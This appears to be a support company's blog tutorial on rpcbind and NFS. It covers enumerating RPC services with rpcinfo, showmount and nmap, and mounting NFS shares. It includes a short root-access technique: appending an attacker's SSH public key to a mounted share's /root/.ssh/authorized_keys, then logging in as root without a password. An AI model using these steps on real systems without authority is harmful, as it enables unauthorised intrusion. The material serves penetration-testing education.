Learn how to use & exploit RPCBind NFS. Our NFS Support team is here to help you with your questions and concerns.

RPCBind NFS Exploit & More

Did you know that the rpcbind utility plays a key role in Unix-based systems?

It helps with the mapping of RPC services to their corresponding ports. In other words, it lets RPC processes register their listening ports and program numbers with rpcbind. Thereby, enabling client systems to connect with the needed services.

Today, we are going to take a closer look at rpcbind, its default port (111/TCP/UDP), and its role in NFS (Network File System).

RPC-based services heavily rely on rpcbind to manage connections with incoming client requests. It has to be available before any of these services start.

Enumeration Techniques

• We can use the `rpcinfo irked.htb` command to get information about RPC services on a host.
• Else we can run the following command to use the nmap tool, to scan the host with the IP address 192.168.10.1.
  nmap -sSUC -p111 192.168.10.1
• Then, run the following command to check if NFS is in use. If both 111 and 2049 are listed, shares are enabled, and mounting is possible.

  rpcinfo -p IPAddress

Working with NFS

1. If NFS is available, we can use `showmount -e $ip` to view available mounting points.
2. We can mount a NFS share by creating a directory for mounting:

   mkdir /mnt/nfs

   Then, mount the file system:

   mount -t nfs $ip:/share /mnt/nfs
3. We can unmount shares forcefully with this command:

   umount -f -l /mnt/nfs

Furthermore, here are some common techniques for security assessment:

• The command “ssh-keygen” will generate a pair of SSH keys – a private key and a public key.
• We can add the public key to the remote host’s authorized keys:

  cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
• Then, access the remote host without a password:

  ssh root@$ip

Nmap Scans for rpcbind and NFS

• nmap -v -p 111 10.11.1.1-254

  This command performs a verbose Nmap scan on ports 111 for hosts in the range 10.11.1.1 to 10.11.1.254.
• nmap -sV -p 111 –script=rpcinfo 10.11.1.1-254

  Here, a service version scan is conducted on port 111. Additionally, the NSE script rpcinfo gathers more information about the RPC services on the hosts.
• nmap -p 111 –script nfs* 10.11.1.72

  This command scans port 111 on the specific host and uses NSE scripts prefixed with “nfs” to get more information about NFS-related services.

Furthermore, we can run an intense NMAP scan on the target:

nmap -p 1-65535 -T4 -A -v 192.168.1.112

Also, to conduct a NFS assessment we can use `rpcinfo -p 192.168.1.112` and `rpcinfo -p 192.168.1.112 | grep nfs`.

[Need assistance with a different issue? Our team is available 24/7.]

Conclusion

In brief, our Support Experts demonstrated how to use & exploit RPCBind NFS.